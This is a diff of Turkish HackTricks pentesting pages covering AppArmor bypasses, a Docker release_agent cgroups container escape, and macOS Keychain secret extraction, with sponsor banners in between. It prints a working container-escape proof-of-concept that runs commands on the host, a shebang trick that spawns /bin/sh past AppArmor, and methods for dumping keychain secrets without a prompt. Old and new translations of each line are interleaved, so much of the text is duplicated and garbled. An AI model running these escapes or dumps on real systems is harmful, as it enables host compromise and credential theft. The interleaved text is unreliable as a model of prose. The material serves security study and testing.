Profil'i etkinleştirmek için aşağıdaki adımları izlememiz gerekmektedir:
Profili etkinleştirmek için aşağıdakileri yapmamız gerekiyor:
```
sudo apparmor_parser -r -W mydocker
```
@ -296,32 +244,32 @@ Profilleri listelemek için aşağıdaki komutu kullanabiliriz. Aşağıdaki kom
$ sudo apparmor_status | grep mydocker
mydocker
```
Aşağıda gösterildiği gibi, "AppArmor" profilinin "/etc/" dizinine yazma erişimini engellediği için "AppArmor" profili değiştirilmeye çalışıldığında hata alırız.
Aşağıda gösterildiği gibi, "AppArmor" profili "/etc/" dizinine yazma erişimini engellediği için "etc/" dizinini değiştirmeye çalıştığımızda hata alırız.
```
$ docker run --rm -it --security-opt apparmor:mydocker -v ~/haproxy:/localhost busybox chmod 400 /etc/hostname
chmod: /etc/hostname: Permission denied
```
### AppArmor Docker Bypass1
Bir konteynerin hangi **apparmor profili çalıştırdığını** bulmak için şunu kullanabilirsiniz:
Bir konteynerin çalıştırdığı **apparmor profilini** bulmak için şunu kullanabilirsiniz:
```bash
docker inspect 9d622d73a614 | grep lowpriv
"AppArmorProfile": "lowpriv",
"apparmor=lowpriv"
```
Ardından, aşağıdaki satırı çalıştırarak **kullanılan kesin profilin bulunmasını** sağlayabilirsiniz:
Ardından, kullanılan tam profilini bulmak için aşağıdaki satırı çalıştırabilirsiniz:
```bash
find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null
```
Eğer apparmor docker profilini değiştirip yeniden yükleyebilirseniz, sınırlamaları kaldırabilir ve onları "atlayabilirsiniz".
### AppArmor Docker Bypass2
### AppArmor Docker Atlatma2
Eğer **apparmor docker profilini değiştirebilir ve yeniden yükleyebilirseniz** tuhaf bir durumda. Kısıtlamaları kaldırabilir ve onları "atlayabilirsiniz".
AppArmor, yol tabanlıdır, bu da demektir ki **`/proc`** gibi bir dizin içindeki dosyaları koruyor olsa bile, **konteynerin nasıl çalıştırılacağını yapılandırabilirseniz**, ana bilgisayarın proc dizinini **`/host/proc`** içine bağlayabilir ve bu şekilde AppArmor tarafından korunmaz.
**AppArmor, yol tabanlıdır**, bu da demektir ki eğer **bir dizin içindeki dosyaları koruyorsa** bile **`/proc`** gibi, eğer **konteynerin nasıl çalıştırılacağını yapılandırabilirseniz**, ana bilgisayarın proc dizinini **`/host/proc`** içine bağlayabilir ve artık **AppArmor tarafından korunmaz**.
### AppArmor Shebang Atlatma
[**Bu hata**](https://bugs.launchpad.net/apparmor/+bug/1911431)da, belirli kaynaklarla perl'in çalışmasını engellemenize rağmen, sadece bir kabuk betiği oluşturup ilk satırda **`#!/usr/bin/perl`** belirtirseniz ve dosyayı doğrudan çalıştırırsanız, istediğinizi çalıştırabilirsiniz. Örneğin:
Bu [**bu hata**](https://bugs.launchpad.net/apparmor/+bug/1911431)da, **belirli kaynaklarla perl'in çalışmasını engelliyorsanız bile**, sadece bir kabuk betiği oluşturursanız ve ilk satırda **`#!/usr/bin/perl`** belirtirseniz ve dosyayı **doğrudan çalıştırırsanız**, istediğinizi çalıştırabilirsiniz. Örn.:
```perl
echo '#!/usr/bin/perl
use POSIX qw(strftime);
@ -331,16 +279,28 @@ exec "/bin/sh"' > /tmp/test.pl
chmod +x /tmp/test.pl
/tmp/test.pl
```
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret ederek ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -1,23 +1,34 @@
# Docker release_agent cgroups kaçışı
# Docker release\_agent cgroups kaçışı
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> öğrenin!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na(https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünleri**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi**](https://opensea.io/collection/the-peass-family)'ni keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
**Daha fazla ayrıntı için, [orijinal blog yazısına](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) başvurun.** Bu sadece bir özet:
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
Orijinal PoC:
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
**Daha fazla ayrıntı için, [orijinal blog gönderisine](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) başvurun.** Bu sadece bir özet:
```shell
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
@ -25,50 +36,62 @@ t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
```
**Kavramın Kanıtı (PoC)**, cgroups'ı sömürmek için bir yöntemi gösterir. Bu yöntemde, `release_agent` dosyası oluşturulur ve çağrısı tetiklenerek konteyner ana bilgisayarında keyfi komutlar çalıştırılır. İşte adımların ayrıntılııklaması:
**Kavram Kanıtı (PoC)**, cgroups'ı sömürmek için bir yöntemi gösterir. Bu, `release_agent` dosyası oluşturarak ve çağrısını tetikleyerek konteyner ana bilgisayarında keyfi komutları yürütmek için kullanılır. İşte dahil olan adımların ayrıntıları:
1. **Ortamı Hazırlama:**
- `cgroup` için bir bağlama noktası olarak kullanılmak üzere `/tmp/cgrp` adlı bir dizin oluşturulur.
- RDMA cgroup denetleyicisi bu dizine bağlanır. RDMA denetleyicisi bulunmaması durumunda, alternatif olarak `memory` cgroup denetleyicisi kullanılması önerilir.
- `cgrp` adlı bir dizin oluşturulur ve cgroup için bir bağlama noktası olarak hizmet verir.
- RDMA cgroup denetleyicisi bu dizine bağlanır. RDMA denetleyicisinin bulunmaması durumunda, alternatif olarak `memory` cgroup denetleyicisinin kullanılması önerilir.
```shell
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
```
2. **Çocuk Cgroup'u Kurulumu:**
- Bağlanmış cgroup dizini içinde "x" adında bir çocuk cgroup oluşturulur.
- "x" cgroup için bildirimler, notify_on_release dosyasına 1 yazılarak etkinleştirilir.
- Bağlanmış cgroup dizini içinde "x" adında bir çocuk cgroup oluşturulur.
- "x" cgroup için bildirimler, notify_on_release dosyasına 1 yazılarak etkinleştirilir.
```shell
echo 1 > /tmp/cgrp/x/notify_on_release
```
3. **Yayın Ajanını Yapılandırın:**
3. **Yayın Ajanını Yapılandır:**
- Konteynerin ana bilgisayardaki yolu /etc/mtab dosyasından elde edilir.
- Ardından cgroup'ın release_agent dosyası, elde edilen ana bilgisayar yolunda bulunan /cmd adlı bir betiği çalıştırmak üzere yapılandırılır.
- Ardından cgroup'un release_agent dosyası, elde edilen ana bilgisayar yolunda bulunan /cmd adlı bir betiği çalıştırmak üzere yapılandırılır.
```shell
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
```
4. **/cmd Betiği Oluştur ve Yapılandır:**
- /cmd betiği, konteyner içinde oluşturulur ve ps aux komutunu çalıştırmak üzere yapılandırılır, çıktıyı konteyner içinde /output adlı bir dosyaya yönlendirir. Ana bilgisayardaki /output dosyasının tam yolu belirtilir.
4. **/cmd Betiği Oluşturun ve Yapılandırın:**
- /cmd betiği konteyner içinde oluşturulur ve ps aux komutunu çalıştırmak üzere yapılandırılır, çıktı /output adlı bir dosyaya yönlendirilir. Ana makinedeki /output dosyasının tam yolu belirtilir.
```shell
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
```
5. **Saldırıyı Tetikle:**
- "x" çocuk cgroup içinde bir işlem başlatılır ve hemen sonlandırılır.
- Bu, `release_agent`'ı (the /cmd script) tetikler, bu da ana makinede ps aux komutunu çalıştırır ve çıktıyı konteyner içindeki /output'a yazar.
- Bir işlem "x" çocuk cgroups içinde başlatılır ve hemen sonlandırılır.
- Bu, `release_agent` (the /cmd script) tetikler ve ana bilgisayarda ps aux komutunu çalıştırır ve çıktıyı konteyner içinde /output'a yazar.
```shell
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark web** destekli bir arama motorudur.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -1,69 +1,83 @@
# macOS Anahtar Zinciri
# macOS Anahtarlık
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramanla öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na(https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* Hacking hilelerinizi göndererek HackTricks ve HackTricks Cloud github depolarına **PR göndererek** hilelerinizi paylaşın.
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## Ana Anahtar Zincirleri
## WhiteIntel
* **Kullanıcı Anahtar Zinciri** (`~/Library/Keychains/login.keycahin-db`), uygulama şifreleri, internet şifreleri, kullanıcı tarafından oluşturulan sertifikalar, ağ şifreleri ve kullanıcı tarafından oluşturulan genel/özel anahtarlar gibi **kullanıcıya özgü kimlik bilgilerini** saklamak için kullanılır.
* **Sistem Anahtar Zinciri** (`/Library/Keychains/System.keychain`), WiFi şifreleri, sistem kök sertifikaları, sistem özel anahtarları ve sistem uygulama şifreleri gibi **sistem genelindeki kimlik bilgilerini** saklar.
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
### Şifre Anahtar Zinciri Erişimi
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
Bu dosyalar, **doğal korumaya sahip olmasalar da indirilebilir** ve **kullanıcının düz metin şifresinin şifresini çözmek** için şifrelenmiştir. Şifre çözme için [**Chainbreaker**](https://github.com/n0fate/chainbreaker) gibi bir araç kullanılabilir.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
## Anahtar Zinciri Girişleri Koruma
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## Anahtarlık Girişleri
* **Kullanıcı Anahtarlığı** (`~/Library/Keychains/login.keycahin-db`), uygulama şifreleri, internet şifreleri, kullanıcı tarafından oluşturulan sertifikalar, ağ şifreleri ve kullanıcı tarafından oluşturulan genel/özel anahtarlar gibi **kullanıcıya özgü kimlik bilgilerini** saklamak için kullanılır.
* **Sistem Anahtarlığı** (`/Library/Keychains/System.keychain`), WiFi şifreleri, sistem kök sertifikaları, sistem özel anahtarları ve sistem uygulama şifreleri gibi **sistem genelindeki kimlik bilgilerini** saklar.
### Şifre Anahtarlık Erişimi
Bu dosyalar, doğal korumaya sahip olmasalar da **şifrelenmiştir** ve **çözülmek için kullanıcının düz metin şifresine ihtiyaç duyarlar**. [**Chainbreaker**](https://github.com/n0fate/chainbreaker) gibi bir araç şifre çözme işlemi için kullanılabilir.
## Anahtarlık Girişleri Korumaları
### ACL'ler
Anahtar zincirindeki her giriş, anahtar zinciri girişi üzerinde çeşitli işlemleri gerçekleştirebilecek kişileri belirleyen **Erişim Kontrol Listeleri (ACL'ler)** tarafından yönetilir. Bu işlemler şunları içerebilir:
Anahtarlıkta her giriş, anahtarlık girişinde çeşitli işlemleri kimin yapabileceğini belirleyen **Erişim Kontrol Listeleri (ACL'ler)** tarafından yönetilir, bunlar şunları içerir:
* **ACLAuhtorizationExportClear**: Sahibin sırrın açık metnini almasına izin verir.
* **ACLAuhtorizationExportWrapped**: Sahibin başka bir sağlanan şifreyle şifrelenmiş açık metni almasına izin verir.
* **ACLAuhtorizationExportWrapped**: Sahibin sırrı başka bir sağlanan şifre ile şifrelenmiş şekilde almasına izin verir.
* **ACLAuhtorizationAny**: Sahibin herhangi bir işlemi gerçekleştirmesine izin verir.
ACL'ler, bu işlemleri sormadan gerçekleştirebilen **güvenilir uygulamaların bir listesiyle** birlikte gelir. Bu şunları içerebilir:
ACL'ler, bu işlemleri kullanıcıya sormadan gerçekleştirebilen **güvenilir uygulamaların listesi** ile desteklenir. Bu şunları içerebilir:
* &#x20;**N`il`** (yetkilendirme gerektirilmez, **herkes güvenilir**)
* **Boş** bir liste (**hiç kimse güvenilir değil**)
* **`Nil`** (izin gerekmez, **herkes güvenilir**)
* Boş bir liste (**hiç kimse güvenilir değil**)
* Belirli **uygulamaların listesi**.
Ayrıca giriş, **`ACLAuthorizationPartitionID`** anahtarını içerebilir, bu da **teamid, apple** ve **cdhash'yi** tanımlamak için kullanılır.
* Eğer **teamid** belirtilmişse, giriş değerine **sorma olmadan** erişmek için kullanılan uygulamanın **aynı teamid'ye** sahip olması gerekir.
* Eğer **apple** belirtilmişse, uygulama **Apple** tarafından **imzalanmış** olmalıdır.
* Eğer **cdhash** belirtilmişse, uygulama belirli bir **cdhash'e** sahip olmalıdır.
* Eğer **teamid** belirtilmişse, giriş değerine **izin vermek** için kullanılan uygulamanın **aynı teamid'ye** sahip olması gerekir.
* Eğer **apple** belirtilmişse, uygulamanın **Apple** tarafından **imzalanmış** olması gerekir.
* Eğer **cdhash** belirtilmişse, uygulamanın belirli **cdhash'e** sahip olması gerekir.
### Bir Anahtar Zinciri Girişi Oluşturma
### Bir Anahtarlık Girişi Oluşturma
**`Keychain Access.app`** kullanılarak **yeni bir giriş oluşturulduğunda**, aşağıdaki kurallar geçerlidir:
**`Anahtarlık Erişimi.app`** kullanılarak **yeni bir giriş oluşturulduğunda**, aşağıdaki kurallar geçerlidir:
* Tüm uygulamalar şifreleyebilir.
* **Hiçbir uygulama** ihracat/şifre çözme yapamaz (kullanıcıya sormadan).
* Hiçbir uygulama dışa aktaramaz/çözemez (kullanıcıya sormadan).
* Tüm uygulamalar bütünlük kontrolünü görebilir.
* Hiçbir uygulama ACL'leri değiştiremez.
* **PartitionID** **`apple`** olarak ayarlanır.
Bir **uygulama anahtar zincirine bir giriş oluşturduğunda**, kurallar biraz farklıdır:
**Bir uygulama anahtarlıkta bir giriş oluşturduğunda**, kurallar biraz farklıdır:
* Tüm uygulamalar şifreleyebilir.
* Yalnızca **oluşturan uygulama** (veya başka uygulamalar da eklenmişse) ihracat/şifre çözme yapabilir (kullanıcıya sormadan).
* Yalnızca **oluşturan uygulama** (veya ıkça eklenen diğer uygulamalar) dışa aktarabilir/çözebilir (kullanıcıya sormadan).
* Tüm uygulamalar bütünlük kontrolünü görebilir.
* Hiçbir uygulama ACL'leri değiştiremez.
* **PartitionID** **`teamid:[buraya takım kimliği]`** olarak ayarlanır.
* **PartitionID** **`teamid:[teamID buraya]`** olarak ayarlanır.
## Anahtar Zincirine Erişim
## Anahtarlığa Erişim
### `security`
```bash
@ -79,68 +93,81 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
### API'ler
{% hint style="success" %}
**Anahtar zinciri numaralandırma ve sızıntı oluşturmayan** sırların dökümü, [**LockSmith**](https://github.com/its-a-feature/LockSmith) adlı araçla yapılabilir.
**Anahtarlık numaralandırma ve sızdırmak** için **izin istemeyen** sırları, [**LockSmith**](https://github.com/its-a-feature/LockSmith) aracıyla yapılabilir.
{% endhint %}
Her anahtar zinciri girişi hakkında **bilgi** alın ve listelenin:
Her anahtarlık girişi hakkında liste ve **bilgi** alın:
* **`SecItemCopyMatching`** API'si her giriş hakkında bilgi verir ve kullanırken ayarlayabileceğiniz bazı özellikler vardır:
* **`kSecReturnData`**: Eğer doğruysa, verileri şifrelemeye çalışır (potansiyel açılır pencereleri önlemek için false olarak ayarlayın)
* **`kSecReturnRef`**: Anahtar zinciri öğesine referansı da alın (sonradan açılır pencereler olmadan şifrelemeyi yapabiliyorsanız true olarak ayarlayın)
* **`kSecReturnData`**: Doğruysa verileri şifrelemeye çalışır (muhtemel açılır pencereleri önlemek için false olarak ayarlayın)
* **`kSecReturnRef`**: Anahtarlık öğesine referansı da alın (daha sonra açılır pencere olmadan şifreleyebileceğinizi gördüğünüzde true olarak ayarlayın)
* **`kSecReturnAttributes`**: Girişler hakkında meta verileri alın
* **`kSecMatchLimit`**: Kaç sonuç döndürüleceği
* **`kSecClass`**: Hangi tür anahtar zinciri girişi
* **`kSecClass`**: Hangi türde anahtarlık girişi
Her girişin **ACL'lerini** alın:
Her girişin **ACL'leri** alın:
* **`SecAccessCopyACLList`** API'siyle anahtar zinciri öğesinin **ACL'sini** alabilir ve her bir liste şunları içerir:
* **`SecAccessCopyACLList`** API'si ile **anahtarlık öğesi için ACL'yi** alabilir ve her liste şunları içerir:
* Açıklama
* **Güvenilir Uygulama Listesi**. Bu bir uygulama olabilir: /Applications/Slack.app
* Bir ikili dosya olabilir: /usr/libexec/airportd
* Bir grup olabilir: group://AirPort
* **Güvenilen Uygulama Listesi**. Bu şunlar olabilir:
* Bir uygulama: /Applications/Slack.app
* Bir ikili: /usr/libexec/airportd
* Bir grup: group://AirPort
Veriyi dışa aktarın:
* **`SecKeychainItemCopyContent`** API'si düz metni alır
* **`SecItemExport`** API'si anahtarları ve sertifikaları dışa aktarır, ancak içeriği şifreli olarak dışa aktarmak için şifreleri ayarlamak gerekebilir
* **`SecItemExport`** API'si anahtarları ve sertifikaları dışa aktarır ancak içeriği şifreli olarak dışa aktarmak için şifreleri ayarlamak gerekebilir
Ve sızıntı oluşturmadan bir sırrı dışa aktarabilmek için **gereksinimler** şunlardır:
Ve bunlar, **izin istemeden bir sırrı dışa aktarabilmek için gereksinimlerdir**:
* Eğer **1 veya daha fazla güvenilir** uygulama listelenmişse:
* Uygun **yetkilendirmelere** ihtiyaç vardır (**`Nil`**, veya sırra erişim yetkisi için yetkilendirme izin verilen uygulama listesinin bir parçası olmak)
* Kod imzasının **PartitionID** ile eşleşmesi gerekmektedir
* Kod imzasının **güvenilir bir uygulama** ile eşleşmesi gerekmektedir (veya doğru KeychainAccessGroup üyesi olmak)
* Eğer **tüm uygulamalar güvenilir** ise:
* Eğer **1'den fazla güvenilen** uygulama listelenmişse:
* Uygun **yetkilendirmelere** ihtiyaç vardır (**`Nil`**, veya sırra erişim yetkisi için yetkilendirme izin listesinde olmak)
* Kod imzasının **PartitionID** ile eşleşmesi gerekir
* Kod imzasının bir **güvenilen uygulamanın** kod imzasıyla eşleşmesi gerekir (veya doğru KeychainAccessGroup üyesi olmak)
* Eğer **tüm uygulamalar güvenilirse**:
* Uygun **yetkilendirmelere** ihtiyaç vardır
* Kod imzasının **PartitionID** ile eşleşmesi gerekmektedir
* Eğer **PartitionID** yoksa, bu gerekli değildir
* Kod imzasının **PartitionID** ile eşleşmesi gerekir
* Eğer **PartitionID yoksa**, bu gerekli değildir
{% hint style="danger" %}
Bu nedenle, eğer **1 uygulama listelenmişse**, o uygulamaya **kod enjekte etmeniz gerekmektedir**.
Bu nedenle, eğer **1 uygulama listelenmişse**, o uygulamaya **kod enjekte etmeniz gerekir**.
Eğer **partitionID**'de **apple** belirtilmişse, **`osascript`** ile erişebilirsiniz, böylece partitionID'sinde apple olan tüm uygulamalara güvenen herhangi bir şey. Bunun için **`Python`** da kullanılabilir.
Eğer **partitionID**'de **apple** belirtilmişse, **`osascript`** ile buna erişebilirsiniz, böylece partitionID'sinde apple olan tüm uygulamalara güvenen her şeye erişebilirsiniz. **`Python`** bunun için de kullanılabilir.
{% endhint %}
### İki ek özellik
* **Görünmez**: Bu, girişi **UI** Anahtar Zinciri uygulamasından **gizlemek** için bir boolean bayrağıdır.
* **Genel**: Bu, **meta verileri** depolamak için kullanılır (bu nedenle ŞİFRELENMEZ)
* Microsoft, hassas uç noktalara erişmek için tüm yenileme belirteçlerini düz metinde depoluyordu.
* **Görünmez**: Girişi **UI** Anahtarlık uygulamasından **gizlemek** için bir boolean bayrak
* **Genel**: **Meta verileri** saklamak için (YANİ ŞİFRELENMEMİŞTİR)
* Microsoft, hassas uç noktalara erişmek için tüm yenileme tokenlarını düz metinde saklıyordu.
## Referanslar
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
